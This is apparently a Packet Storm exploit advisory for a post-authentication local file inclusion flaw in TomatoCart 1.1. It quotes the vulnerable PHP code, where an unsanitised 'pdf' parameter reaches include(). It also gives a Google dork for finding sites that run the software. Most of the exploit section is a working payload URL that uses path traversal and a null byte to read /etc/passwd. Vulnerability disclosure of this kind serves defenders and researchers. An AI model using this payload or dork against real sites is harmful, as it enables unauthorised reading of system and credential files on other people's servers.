TomatoCart version 1.1 suffers from a post authentication local file inclusion vulnerability.
2d3ab536888c122c3eb2b9cdbf19a3f9db6e13f627cc77e9a5df15d8497e0f43# Exploit Title: TomatoCart 1.1 PostAuth Local File Include
# Google Dork: "Powered by TomatoCart"
# Date: 25.10.2010
# Author: brain[pillow]
# Software Link: https://www.tomatocart.com/
# Version: 1.1
=========================================================
# Vuln. code:
if ($osC_Customer->isLoggedOn() === true) {
if (isset($_REQUEST['module'])) {
$module = $_REQUEST['module'];
$osC_Language->load($module);
}
if (isset($_REQUEST['pdf'])) {
$pdf = $_REQUEST['pdf'];
}
if (!empty($module) && !empty($pdf)) {
if (file_exists('includes/modules/pdf/' . $pdf . '.php')) {
include('includes/modules/pdf/' . $pdf . '.php');
$pdf_class = 'toC_' .ucfirst($pdf) . '_PDF';
$object = new $pdf_class();
$object ->render();
exit;
}
}
}
=========================================================
# Exploit:
/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed